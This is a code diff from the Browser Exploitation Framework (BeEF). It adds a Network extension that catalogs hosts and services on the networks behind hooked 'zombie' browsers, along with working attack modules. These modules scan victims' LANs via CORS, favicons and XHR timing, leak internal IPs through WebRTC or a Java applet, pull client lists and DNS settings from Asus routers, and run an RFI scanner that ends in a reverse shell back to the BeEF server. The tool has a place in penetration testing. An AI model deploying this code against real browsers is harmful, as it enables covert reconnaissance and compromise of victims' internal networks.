type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
}]
});
grid.rowCtxMenu.showAt(e.getXY());
},
afterrender: function(datagrid) {
datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
}
}
});
var services_panel = new Ext.Panel({
id: 'network-services-panel-zombie-'+zombie.session,
title: 'Services',
items:[services_panel_grid],
layout: 'fit',
listeners: {
activate: function(services_panel) {
services_panel.items.items[0].store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
}
}
});
/*
* The Network tab constructor
********************************************/
ZombieTab_Network.superclass.constructor.call(this, {
id: 'zombie-network-tab-zombie-'+zombie.session,
title: 'Network',
activeTab: 0,
viewConfig: {
forceFit: true,
stripRows: true,
type: 'fit'
},
items: [hosts_panel, services_panel],
bbar: commands_statusbar,
listeners: {
}
});
};
Ext.extend(ZombieTab_Network, Ext.TabPanel, {});

24
extensions/network/api.rb Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Network
module RegisterHttpHandler
BeEF::API::Registrar.instance.register(BeEF::Extension::Network::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
# Mounts the handler for processing network host info.
#
# @param beef_server [BeEF::Core::Server] HTTP server instance
def self.mount_handler(beef_server)
beef_server.mount('/api/network', BeEF::Extension::Network::NetworkRest.new)
end
end
end
end
end

12
extensions/network/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
network:
name: 'Network'
enable: true
authors: ["bcoles"]
description: "This extension facilitates interaction with hosts on a zombie browser's local area network(s). It provides a point and click interface for performing a variety of actions including host discovery, fingerprinting and exploitation. Identified network hosts are available in the Network -> Hosts panel. Identified network services are available in the Network -> Services panel. Right-click a host or service for more options."

27
extensions/network/extension.rb Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Network
extend BeEF::API::Extension
@short_name = 'network'
@full_name = 'Network'
@description = "This extension provides a simple interface for interacting with hosts on a zombie browser's local area networks."
end
end
end
require 'extensions/network/network'
require 'extensions/network/models/network_host'
require 'extensions/network/models/network_service'
require 'extensions/network/api'
require 'extensions/network/rest/network'
require 'dm-serializer'

31
extensions/network/models/network_host.rb Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Table stores each host identified on the zombie browser's network(s)
#
class NetworkHost
include DataMapper::Resource
storage_names[:default] = 'network_host'
property :id, Serial
property :hooked_browser_id, Text, :lazy => false
property :ip, Text, :lazy => false
property :hostname, String, :lazy => false
property :type, String, :lazy => false # proxy, router, gateway, dns, etc
property :os, String, :lazy => false
property :mac, String, :lazy => false
property :cid, String, :lazy => false # command id or 'init'
end
end
end
end

30
extensions/network/models/network_service.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Table stores each open port identified on the zombie browser's network(s)
#
class NetworkService
include DataMapper::Resource
storage_names[:default] = 'network_service'
property :id, Serial
property :hooked_browser_id, Text, :lazy => false
property :proto, String, :lazy => false
property :ip, Text, :lazy => false
property :port, String, :lazy => false
property :type, String, :lazy => false
property :cid, String, :lazy => false # command id or 'init'
end
end
end
end

13
extensions/network/network.rb Normal file
View File

@@ -0,0 +1,13 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Network
end
end
end

169
extensions/network/rest/network.rb Normal file
View File

@@ -0,0 +1,169 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Network
# This class handles the routing of RESTful API requests that interact with network services on the zombie's LAN
class NetworkRest < BeEF::Core::Router::Router
# Filters out bad requests before performing any routing
before do
config = BeEF::Core::Configuration.instance
@nh = BeEF::Core::Models::NetworkHost
@ns = BeEF::Core::Models::NetworkService
# Require a valid API token from a valid IP address
halt 401 unless params[:token] == config.get('beef.api_token')
halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Returns the entire list of network hosts for all zombies
get '/hosts' do
begin
hosts = @nh.all
count = hosts.length
result = {}
result[:count] = count
result[:hosts] = hosts.to_json
result.to_json
rescue StandardError => e
print_error "Internal error while retrieving host list (#{e.message})"
halt 500
end
end
# Returns the entire list of network services for all zombies
get '/services' do
begin
services = @ns.all
count = services.length
result = {}
result[:count] = count
result[:services] = services.to_json
result.to_json
rescue StandardError => e
print_error "Internal error while retrieving service list (#{e.message})"
halt 500
end
end
# Returns all hosts given a specific hooked browser id
get '/hosts/:id' do
begin
id = params[:id]
hosts = @nh.all(:hooked_browser_id => id)
count = hosts.length
result = {}
result[:count] = count
result[:hosts] = hosts
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving hosts list for hooked browser with id #{id} (#{e.message})"
halt 500
end
end
# Returns all services given a specific hooked browser id
get '/services/:id' do
begin
id = params[:id]
services = @ns.all(:hooked_browser_id => id)
count = services.length
result = {}
result[:count] = count
result[:services] = services
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving service list for hooked browser with id #{id} (#{e.message})"
halt 500
end
end
# Returns a specific host given its id
get '/host/:id' do
begin
id = params[:id]
host = @nh.all(:id => id)
raise InvalidParamError, 'id' if host.nil?
halt 404 if host.empty?
host.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving host with id #{id} (#{e.message})"
halt 500
end
end
# Returns a specific service given its id
get '/service/:id' do
begin
id = params[:id]
service = @ns.all(:id => id)
raise InvalidParamError, 'id' if service.nil?
halt 404 if service.empty?
service.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving service with id #{id} (#{e.message})"
halt 500
end
end
# Raised when invalid JSON input is passed to an /api/network handler.
class InvalidJsonError < StandardError
DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/network handler'
def initialize(message = nil)
super(message || DEFAULT_MESSAGE)
end
end
# Raised when an invalid named parameter is passed to an /api/network handler.
class InvalidParamError < StandardError
DEFAULT_MESSAGE = 'Invalid parameter passed to /api/network handler'
def initialize(message = nil)
str = "Invalid \"%s\" parameter passed to /api/network handler"
message = sprintf str, message unless message.nil?
super(message)
end
end
end
end
end
end

7
modules/debug/test_cors_request/config.yaml
View File

@@ -11,9 +11,11 @@ beef:
name: "Test CORS Request"
description: "Test the beef.net.cors.request function by retrieving a URL."
authors: ["bcoles"]
# http://caniuse.com/cors
target:
working: ["ALL"]
not_working:
# CORS is partially supported on IE 8 & 9
IE:
min_ver: 6
max_ver: 7
@@ -22,7 +24,10 @@ beef:
max_ver: 11
C:
min_ver: 1
max_ver: 2
max_ver: 3
S:
min_ver: 1
max_ver: 3
F:
min_ver: 1
max_ver: 3

2
modules/exploits/rfi_scanner/command.js
View File

@@ -10,7 +10,7 @@ beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var base_dir = '<%= @base_dir %>';
var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
var target = rproto + '://' + rhost + ':' + rport + base_dir;
var wait = '<%= @wait %>';

2
modules/exploits/rfi_scanner/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Exploits"
name: "RFI Scanner"
description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.</br><br/>This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the <a href='https://code.google.com/p/fuzzdb/'>fuzzdb</a> <a href='https://fuzzdb.googlecode.com/svn/trunk/attack-payloads/rfi/rfi.txt'>RFI list</a>. Many of these vulns require the target to have register_globals enabled in the PHP config.<br/><br/>The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
authors: ["bcoles"]
target:
working: ["ALL"]

4
modules/exploits/rfi_scanner/module.rb
View File

@@ -149,11 +149,8 @@ EOS
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = "" if lhost == "0.0.0.0"
url = "#{proto}://#{lhost}:#{beef_port}"
return [
{ 'name' => 'rproto',
'type' => 'combobox',
@@ -173,7 +170,6 @@ EOS
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
{ 'name' => 'payload_url', 'ui_label' => 'BeEF server URL', 'value' => url },
{ 'name' => 'payload',
'type' => 'combobox',
'ui_label' => 'Payload',

3
modules/exploits/router/asus_rt_series_get_info/command.js
View File

@@ -31,7 +31,8 @@ beef.execute(function() {
beef.debug(target_ip + " - gathering info completed");
beef.net.send("<%= @command_url %>", <%= @command_id %>,
"clients=" + clients +
"ip=" + target_ip +
"&clients=" + clients +
"&wanip=" + wanip +
"&netmask=" + netmask +
"&gateway=" + gateway +

48
modules/exploits/router/asus_rt_series_get_info/module.rb
View File

@@ -13,6 +13,54 @@ class Asus_rt_series_get_info < BeEF::Core::Command
def post_execute
save({'result' => @datastore['result']})
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
# log the network hosts
if @datastore['results'] =~ /ip=(.+)&clients=(.+)&wanip=(.+)&netmask=(.+)&gateway=(.+)&dns=(.+)/
ip = "#{$1}"
clients = "#{$2}"
wanip = "#{$3}"
netmask = "#{$4}"
gateway = "#{$5}"
dns_servers = "#{$6}"
if !ip.nil?
print_debug("Hooked browser found Asus RT series router [ip: #{ip}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid)
r.save
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => 80, :type => 'HTTP Server', :cid => cid)
r.save
end
clients.scan(/([\d\.]+,[:\dA-F]{17})/).flatten.each do |client|
next if client.nil?
if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/
ip = $1
mac = $2
print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
r.save
end
end
if !gateway.nil?
print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid)
r.save
end
if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/
dns_servers.split(/ /).uniq.each do |dns|
print_debug("Hooked browser found DNS server [ip: #{dns}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
r.save
end
end
end
end
end
end

7
modules/host/get_internal_ip/config.yaml
View File

@@ -8,9 +8,8 @@ beef:
get_internal_ip:
enable: true
category: "Host"
name: "Get Internal IP"
description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet"
name: "Get Internal IP (Java)"
description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet.<br/><br/>The browser must have Java enabled and configured to allow execution of unsigned Java applets."
authors: ["antisnatchor"]
target:
working: ["IE", "FF", "O"]
user_notify: ["C", "S"]
user_notify: ["ALL"]

16
modules/host/get_internal_ip/module.rb
View File

@@ -20,6 +20,22 @@ class Get_internal_ip < BeEF::Core::Command
content['Result'] = @datastore['result']
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class')
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
# save the network host
if @datastore['results'] =~ /^([\d\.]+)$/
ip = $1
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
r.save
end
end
end
end

3
modules/host/get_internal_ip_webrtc/command.js
View File

@@ -35,7 +35,8 @@ beef.execute(function() {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
beef.debug("Found IPs: "+ displayAddrs.join(","))
beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","));
}
function grepSDP(sdp) {

2
modules/host/get_internal_ip_webrtc/config.yaml
View File

@@ -13,4 +13,4 @@ beef:
authors: ["xntrik", "@natevw"]
target:
working: ["C", "FF"]
unknown: ["All"]
not_working: ["ALL"]

23
modules/host/get_internal_ip_webrtc/module.rb
View File

@@ -9,6 +9,29 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
# save the network host
if @datastore['results'] =~ /IP is ([\d\.,]+)/
ips = $1.to_s.split(/,/)
if !ips.nil? && !ips.empty?
os = BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName')
ips.uniq.each do |ip|
next unless ip =~ /^[\d\.]+$/
next if ip =~ /^0\.0\.0\.0$/
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
r.save
end
end
end
end
end
end

54
modules/network/cross_origin_scanner/command.js
View File

@@ -16,22 +16,44 @@ beef.execute(function() {
return;
}
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (var i = lowerBound; i <= upperBound; i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
// set target IP addresses
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (var i = lowerBound; i <= upperBound; i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
WorkerQueue = function(frequency) {

9
modules/network/cross_origin_scanner/config.yaml
View File

@@ -9,11 +9,13 @@ beef:
enable: true
category: "Network"
name: "Cross-Origin Scanner"
description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF."
description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
# http://caniuse.com/cors
target:
working: ["ALL"]
not_working:
# CORS is partially supported on IE 8 & 9
IE:
min_ver: 6
max_ver: 7
@@ -22,7 +24,10 @@ beef:
max_ver: 11
C:
min_ver: 1
max_ver: 2
max_ver: 3
S:
min_ver: 1
max_ver: 3
F:
min_ver: 1
max_ver: 3

19
modules/network/cross_origin_scanner/module.rb
View File

@@ -9,6 +9,25 @@ class Cross_origin_scanner < BeEF::Core::Command
content = {}
content['result'] = @datastore['result']
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
# log the network service
if @datastore['results'] =~ /ip=(.+)&port=([\d]+)&status/
ip = $1
port = $2
print_debug("Hooked browser found HTTP server #{ip}:#{port}")
if !ip.nil? && !port.nil?
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid)
r.save
end
end
end
end
def self.options

124
modules/network/get_http_servers/command.js Normal file
View File

@@ -0,0 +1,124 @@
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var ips = new Array();
var proto = 'http';
var ipRange = "<%= @ipRange %>";
var port = "<%= @rport %>";
var timeout = "<%= @timeout %>";
var wait = "<%= @wait %>";
var threads = "<%= @threads %>";
var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');
// set target IP addresses
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
checkFavicon = function(proto, ip, port, uri) {
var img = new Image;
var dom = beef.dom.createInvisibleIframe();
beef.debug("[Favicon Scanner] Checking IP [" + ip + "] (" + proto + ")");
img.src = proto+"://"+ip+":"+port+uri;
img.onerror = function() { dom.removeChild(this); }
img.onload = function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+"&url="+escape(this.src));dom.removeChild(this);
beef.debug("[Favicon Scanner] Found HTTP Server [" + escape(this.src) + "]");
}
dom.appendChild(img);
// stop & remove iframe
setTimeout(function() {
if (dom.contentWindow.stop !== undefined) {
dom.contentWindow.stop();
} else if (dom.contentWindow.document.execCommand !== undefined) {
dom.contentWindow.document.execCommand("Stop", false);
}
document.body.removeChild(dom);
}, timeout*1000);
}
WorkerQueue = function(frequency) {
var stack = [];
var timer = null;
var frequency = frequency;
var start_scan = (new Date).getTime();
this.process = function() {
var item = stack.shift();
eval(item);
if (stack.length === 0) {
clearInterval(timer);
timer = null;
var interval = (new Date).getTime() - start_scan;
beef.debug("[Favicon Scanner] Worker queue is complete ["+interval+" ms]");
return;
}
}
this.queue = function(item) {
stack.push(item);
if (timer === null) {
timer = setInterval(this.process, frequency);
}
}
}
// create worker queue
var workers = new Array();
for (w=0; w < threads; w++) {
workers.push(new WorkerQueue(wait*1000));
}
// for each favicon path
for (var u=0; u < urls.length; u++) {
var worker = workers[u % threads];
// for each LAN IP address
for (var i=0; i < ips.length; i++) {
worker.queue('checkFavicon("'+proto+'","'+ips[i]+'","'+port+'","'+urls[u]+'");');
}
}
});

15
modules/network/get_http_servers/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
get_http_servers:
enable: true
category: "Network"
name: "Get HTTP Servers (Favicon)"
description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
target:
user_notify: ["FF", "IE", "C", "S"]

46
modules/network/get_http_servers/module.rb Normal file
View File

@@ -0,0 +1,46 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Get_http_servers < BeEF::Core::Command
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'rport', 'ui_label' => 'Port', 'value' => '80'},
{'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'},
{'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '1'},
{'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'}
]
end
def post_execute
content = {}
content['url'] = @datastore['url'] if not @datastore['url'].nil?
if content.empty?
content['fail'] = 'No HTTP servers were discovered.'
end
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&url=(.+)/
proto = $1
ip = $2
port = $3
url = $4
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => "HTTP Server", :cid => cid)
r.save
end
end
end
end
end

123
modules/network/identify_lan_subnets/command.js Normal file
View File

@@ -0,0 +1,123 @@
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
if(!beef.browser.isFF() && !beef.browser.isC()){
beef.debug("[command #<%= @command_id %>] Browser is not supported.");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser");
}
var min_timeout = 500;
var ranges = [
'192.168.0.0',
'192.168.1.0',
'192.168.2.0',
'192.168.10.0',
'192.168.100.0',
'192.168.123.0',
'10.0.0.0',
'10.0.1.0',
'10.1.1.0',
'10.10.10.0',
'172.16.0.0',
'172.16.1.0'
];
var doScan = function(timeout) {
var discovered_hosts = [];
var proto = "http";
var doRequest = function(host) {
var d = new Date;
var xhr = new XMLHttpRequest();
xhr.timeout = timeout;
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
var time = new Date().getTime() - d.getTime();
var aborted = false;
// if we call window.stop() the event triggered is 'abort'
// http://www.w3.org/TR/XMLHttpRequest/#event-handlers
xhr.onabort = function(){
aborted = true;
}
xhr.onloadend = function(){
if(time < timeout){
// 'abort' fires always before 'onloadend'
if(time > 1 && aborted === false){
beef.debug('Discovered host ['+host+'] in ['+time+'] ms');
discovered_hosts.push(host);
}
}
}
}
}
xhr.open("GET", proto + "://" + host, true);
xhr.send();
}
var requests = new Array();
for (var i = 0; i < ranges.length; i++) {
// the following returns like 192.168.0.
var c = ranges[i].split('.')[0]+'.'+
ranges[i].split('.')[1]+'.'+
ranges[i].split('.')[2]+'.';
// for every entry in the 'ranges' array, request
// the most common gateway IPs, like:
// 192.168.0.1, 192.168.0.100, 192.168.0.254
requests.push(c + '1');
requests.push(c + '100');
requests.push(c + '254');
}
// process queue
var count = requests.length;
beef.debug("[command #<%= @command_id %>] Identifying LAN hosts ("+count+" URLs) (Timeout " + timeout + "ms)");
var check_timeout = (timeout * count + parseInt(timeout,10));
var handle = setInterval(function() {
if (requests.length > 0) {
doRequest(requests.pop());
}
}, timeout);
// check for results
checkResults = function() {
if (handle) {
beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
}
var hosts = discovered_hosts.join(",");
beef.debug("Discovered " + discovered_hosts.length + " hosts: " + hosts);
if (discovered_hosts.length >= 5) {
// if we get 5+ results something probably went wrong. this happens sometimes.
if (timeout > min_timeout) {
// if timeout is more than 500ms then decrease timeout by 500ms and try again
beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)");
doScan(timeout-500);
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts);
}
} else if (discovered_hosts.length == 0) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results");
} else {
beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed.");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
}
}
setTimeout("checkResults();", check_timeout);
}
var timeout = "<%= @timeout %>";
if (isNaN(timeout) || timeout < 1) timeout = min_timeout;
doScan(parseInt(timeout,10));
});

16
modules/network/identify_lan_subnets/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
identify_lan_subnets:
enable: true
